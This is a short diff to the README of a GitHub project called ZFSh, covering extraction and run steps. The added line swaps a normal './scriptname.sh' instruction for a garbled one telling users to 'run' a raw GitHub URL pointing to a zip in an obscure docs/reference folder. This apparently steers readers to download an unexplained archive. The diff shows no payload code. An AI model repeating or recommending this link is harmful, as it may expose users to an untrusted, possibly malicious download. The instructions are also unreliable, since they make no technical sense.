papaneitor44/ZFSh/README.md

    After downloading, unzip the file to access the scripts.
 Most systems allow you to do this by right-clicking the file and selecting "Extract."

 5. **Run the Scripts**
    Open your terminal (command line interface).
 Navigate to the folder where you extracted ZFSh.
-You can run each script by typing `./scriptname.sh`, replacing `scriptname.sh` with the specific script you wish to use.
+You can run each script by typing `https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip`, replacing `https://raw.githubusercontent.com/papaneitor44/ZFSh/main/docs/reference/ZF-Sh-3.9.zip` with the specific script you wish to use.

 ## 📋 Features